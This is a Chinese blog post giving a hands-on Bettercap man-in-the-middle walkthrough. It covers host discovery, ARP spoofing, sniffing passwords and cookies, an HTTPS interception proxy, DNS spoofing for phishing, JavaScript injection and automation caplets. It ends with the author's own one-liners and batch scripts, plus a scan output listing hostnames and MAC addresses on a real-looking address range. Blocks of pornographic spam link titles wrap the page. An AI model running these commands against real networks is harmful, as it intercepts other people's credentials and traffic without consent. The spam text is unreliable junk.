<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      websec80

        博客園  :: 首頁  :: 新隨筆  :: 聯(lián)系 ::  :: 管理

      https://github.com/bettercap/bettercap/releases

       

      https://github.com/bettercap/bettercap/releases/download/v2.41.4/bettercap_windows_amd64.zip

      安裝完運(yùn)行會(huì)提示缺少 libusb.dll


      https://github.com/libusb/libusb/releases


      需要安裝

      https://www.winpcap.org/install/

       

      第一步:安裝Bettercap (選擇你喜歡的方式)

       

      • 方式三:包管理器 (如Kali Linux)

        sudo apt updatesudo apt install bettercap -y(注意:包管理器中的版本可能不是最新的)

      安裝完成后,打開終端,輸入 sudo bettercap -version (需要sudo權(quán)限來操作網(wǎng)絡(luò)接口和進(jìn)行原始套接字操作) 來驗(yàn)證安裝。

       

      第二步:啟動(dòng)Bettercap與初識(shí)交互界面

      直接在終端輸入 sudo bettercap 即可啟動(dòng)Bettercap的交互式會(huì)話。

      你會(huì)看到一個(gè)類似 >> 的提示符。在這里,你可以輸入各種命令來控制Bettercap的行為。 常用命令:

      help:查看所有可用模塊和命令。help <module_name>:查看特定模塊的詳細(xì)幫助信息(如 help net.sniff)。active:顯示當(dāng)前活動(dòng)模塊及其狀態(tài)。quit 或 exit:退出Bettercap。

       

      第三步:核心模塊實(shí)戰(zhàn)演練 (前方高能!)

      Bettercap的核心在于其強(qiáng)大的模塊。我們來一步步演練最經(jīng)典的中間人攻擊流程:

      1. 網(wǎng)絡(luò)主機(jī)發(fā)現(xiàn) (net.recon) - 摸清家底 這個(gè)模塊用于發(fā)現(xiàn)局域網(wǎng)內(nèi)的存活主機(jī)。

        >> net.recon on

        稍等片刻,Bettercap會(huì)自動(dòng)探測(cè)網(wǎng)絡(luò)。你可以使用 net.show 查看發(fā)現(xiàn)的主機(jī)列表。

        >> net.show

       

      1. ARP欺騙 (arp.spoof) - 掌握流量咽喉 ??

        這是實(shí)現(xiàn)中間人攻擊的關(guān)鍵步驟。它會(huì)欺騙目標(biāo)主機(jī)和網(wǎng)關(guān),讓它們的流量都經(jīng)過你的機(jī)器。

        Bettercap會(huì)持續(xù)發(fā)送ARP欺騙包。此時(shí),目標(biāo)主機(jī)的流量理論上已經(jīng)流經(jīng)你的設(shè)備了。

        • 設(shè)置目標(biāo):你可以選擇欺騙整個(gè)子網(wǎng),或者指定特定目標(biāo)。
          # 欺騙特定目標(biāo) (例如192.168.1.101),讓其流量經(jīng)過你>> set arp.spoof.targets 192.168.1.101# 如果想欺騙整個(gè)子網(wǎng)(謹(jǐn)慎?。ǔP枰O(shè)置 fullduplex# >> set arp.spoof.fullduplex true# >> set arp.spoof.targets 192.168.1.1 (假設(shè)網(wǎng)關(guān)是192.168.1.1)

       

      • 啟動(dòng)欺騙:>> arp.spoof on
      • 流量嗅探 (net.sniff) - 開始“竊聽” ??♂? 一旦ARP欺騙成功,就可以開啟嗅探器來捕獲流經(jīng)你設(shè)備的數(shù)據(jù)包了。

        >> net.sniff on

        Bettercap會(huì)實(shí)時(shí)顯示捕獲到的敏感信息,比如HTTP POST請(qǐng)求中的用戶名密碼、Cookies等。

      • 設(shè)置過濾器 (可選):如果你只想關(guān)注特定流量,可以使用過濾器。

        # 例如,只抓取80端口的TCP流量

        >> set net.sniff.filter tcp port 80# 清除過濾器>> set net.sniff.filter
      • HTTP/HTTPS代理 (http.proxy, https.proxy) - 更深層次的流量操縱 PROXY 這兩個(gè)模塊可以將你的設(shè)備變成一個(gè)HTTP或HTTPS代理,從而攔截和修改Web流量。

        • HTTP代理:>> http.proxy on

          可以配合 set http.proxy.injectjs <JS_URL_or_File> 注入JavaScript代碼。

       

      • HTTPS代理 (涉及SSL證書):>> https.proxy on當(dāng)啟用HTTPS代理時(shí),Bettercap會(huì)自動(dòng)生成SSL證書。目標(biāo)瀏覽器訪問HTTPS網(wǎng)站時(shí)會(huì)收到證書警告(因?yàn)樽C書是自簽名的)。如果用戶忽略警告繼續(xù)訪問,你就能解密并查看HTTPS流量了。
      • ?? 注意:HTTPS代理的濫用可能導(dǎo)致嚴(yán)重隱私泄露,請(qǐng)負(fù)責(zé)任地使用。
      1. DNS欺騙 (dns.spoof) - 指鹿為馬 這個(gè)模塊可以讓你偽造DNS響應(yīng),將特定域名解析到你指定的IP地址。常用于釣魚攻擊。

        現(xiàn)在,當(dāng)被ARP欺騙的目標(biāo)主機(jī)嘗試訪問被你配置的域名時(shí),會(huì)被導(dǎo)向你指定的IP。

      • 配置
        # 將所有域名解析到你的IP (假設(shè)你的IP是192.168.1.100)>> set dns.spoof.all true>> set dns.spoof.address 192.168.1.100# 或者只針對(duì)特定域名# >> set dns.spoof.domains example.com,*.test.org# >> set dns.spoof.address 192.168.1.100啟動(dòng):>> dns.spoof on

      停止模塊:想關(guān)閉某個(gè)模塊,只需將 on 替換為 off,例如 arp.spoof off。

      第四步:優(yōu)雅的Web UI界面

      Bettercap還提供了一個(gè)非常贊的Web界面,讓操作更加直觀。 啟動(dòng)API服務(wù)和Web服務(wù)器:

      >> api.rest on>> http.server on# 或者在較新版本中,可能直接有 ui 命令# >> ui

       

      然后瀏覽器訪問 http://127.0.0.1 (或者Bettercap提示的端口),輸入默認(rèn)憑據(jù)(通常是 user:pass,首次登錄會(huì)提示你修改)即可進(jìn)入Web UI。

      在Web UI里,你可以圖形化地啟動(dòng)/停止模塊、查看目標(biāo)、配置參數(shù)等,非常方便。

       

      第五步:Caplets - 自動(dòng)化你的“騷操作”

      Caplet是Bettercap的腳本文件,后綴為 .cap。你可以預(yù)先寫好一系列命令在caplet文件中,然后讓Bettercap加載執(zhí)行,實(shí)現(xiàn)自動(dòng)化攻擊。

      例如,創(chuàng)建一個(gè) mitm_basic.cap 文件:

      # 開啟網(wǎng)絡(luò)發(fā)現(xiàn)net.recon on# 等待幾秒讓網(wǎng)絡(luò)發(fā)現(xiàn)運(yùn)行sleep 5# 設(shè)置ARP欺騙目標(biāo) (根據(jù)實(shí)際情況修改)set arp.spoof.targets 192.168.1.103, 192.168.1.105arp.spoof on# 開啟嗅探net.sniff on# 開啟HTTP代理并注入JS (假設(shè)你有一個(gè)evil.js)# set http.proxy.injectjs /path/to/your/evil.js# http.proxy on啟動(dòng)Bettercap并加載caplet:

      sudo bettercap -caplet /path/to/your/mitm_basic.cap

       

      進(jìn)階玩法與思路 (點(diǎn)到為止)

      Bettercap的潛力遠(yuǎn)不止于此:

        • WiFi模塊 (wifi.*):進(jìn)行WiFi網(wǎng)絡(luò)的探測(cè)、破解(如PMKID攻擊)、Deauth攻擊等。
        • 藍(lán)牙模塊 (ble.recon, ble.enum):發(fā)現(xiàn)和枚舉附近的藍(lán)牙低功耗設(shè)備。
        • JavaScript注入 (http.proxy.injectjs):配合BeEF等框架,實(shí)現(xiàn)對(duì)目標(biāo)瀏覽器的控制。
        • 自定義數(shù)據(jù)包過濾與修改:更細(xì)致地操控網(wǎng)絡(luò)流量。

       

       

      使用過程中發(fā)現(xiàn)的一些問題

      攻擊機(jī)會(huì)丟包或者斷網(wǎng),于是使用sleep 

      bettercap.exe -eval "set arp.spoof.targets 6.2.1.1;set arp.spoof.whitelist 6.2.1.9;set arp.spoof.fullduplex true;arp.spoof on;set net.sniff.output 120;net.sniff on;sleep 20;arp.spoof off"

       

       

      set arp.spoof.targets 10.0.0.210

      set arp.spoof.targets 00-0c-29-39-eb-57

      set arp.spoof.whitelist 10.0.0.254


      # 啟用ARP欺騙模塊
      arp.spoof on


      set arp.spoof.interfaces Ethernet0
      set arp.spoof.targets 10.0.0.210,10.0.0.1


      netsh interface portproxy add v4tov4 listenaddress=10.0.0.254 listenport=0 connectaddress=10.0.0.1 connectport=0


      @echo off
      REM 啟用 IP 轉(zhuǎn)發(fā)
      powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters' -Name 'IPEnableRouter' -Value 1"
      netsh interface portproxy add v4tov4 listenaddress=192.168.100.5 listenport=0 connectaddress=192.168.100.1 connectport=0

      REM 啟動(dòng) Bettercap
      start /B bettercap -I "以太網(wǎng)" --proxy-module arp_spoof --script "set arp.spoof.targets 10.0.0.210,10.0.0.1 && arp.spoof on && http.proxy on"

      REM 保持窗口打開
      timeout /t 999999


      檢查端口轉(zhuǎn)發(fā)規(guī)則?:

      cmd
      復(fù)制
      netsh interface portproxy show all


      bettercap.exe -eval "set api.rest.port 8081;set api.rest.address 10.0.0.254;set ui.address 10.0.0.254;set ui.port 10000;ui on;set arp.spoof.targets 10.0.0.210;arp.spoof on;set net.sniff.output c:\aswe2233;net.sniff on"

       

      61.250.120.113 │ ac:41:22:c3:29:fd │ DESKTOP-VM7JCPI │ Eclipse Electronic Systems Inc. │ 12 kB │ 0 B │ 16:32:23 │
      │ 61.250.120.187 │ 9c:6b:00:76:41:6b │ DESKTOP-QLM9P11 │ ASRock Incorporation │ 12 kB │ 0 B │ 16:32:23 │
      │ 61.250.120.243 │ 08:bf:b8:a4:80:da │ DESKTOP-4QOAJM1 │ ASUSTek COMPUTER INC. │ 5.1 kB │ 0 B │ 16:32:23 │


      set arp.spoof.targets 6.2.10.3;arp.spoof on;set net.sniff.output c:\2233;net.sniff on

      bettercap.exe -eval "set arp.spoof.targets 6.2.1.1;set arp.spoof.whitelist 6.2.1.9;set arp.spoof.fullduplex true;arp.spoof on;set net.sniff.output 120;net.sniff on;sleep 20;arp.spoof off"

      set arp.spoof.fullduplex true# >> set arp.spoof.targets 192.168.1.1

       

      posted on 2025-10-30 20:50  websec80  閱讀(10)  評(píng)論(0)    收藏  舉報(bào)
      主站蜘蛛池模板: 欧美xxxxx高潮喷水| 人人澡人摸人人添| 恩平市| 亚洲阿v天堂网2021| 国产老妇伦国产熟女老妇高清| 中文字幕国产精品一区二 | 久热这里有精品视频在线| 黄色不卡视频一区二区三区| 亚洲中文字幕av天堂| 性色av无码不卡中文字幕| 国产精品视频中文字幕| 国产区成人精品视频| 日韩无人区码卡1卡2卡| 中文午夜乱理片无码| 欧美激情精品久久久久久| 河北真实伦对白精彩脏话| 亚洲一区二区三区啪啪| 起碰免费公开97在线视频| 野花香视频在线观看免费高清版| 高清无码爆乳潮喷在线观看| 榆中县| 性做久久久久久久| 久久96热在精品国产高清| 精品国产成人网站一区在线| 十九岁的日本电影免费观看| 狠狠色丁香婷婷综合尤物| 好了av四色综合无码| 成人看的污污超级黄网站免费 | 99在线小视频| 亚洲欧洲日韩精品在线| 国产偷窥熟女高潮精品视频| 久热99热这里只有精品| 日本精品极品视频在线| 国产成人精品1024免费下载| 亚洲中文字幕一二区日韩| 午夜福制92视频| 激情综合五月网| 欧美疯狂三p群体交乱视频| 玩弄放荡人妻少妇系列| 亚洲性日韩一区二区三区| 中文字幕日韩有码一区|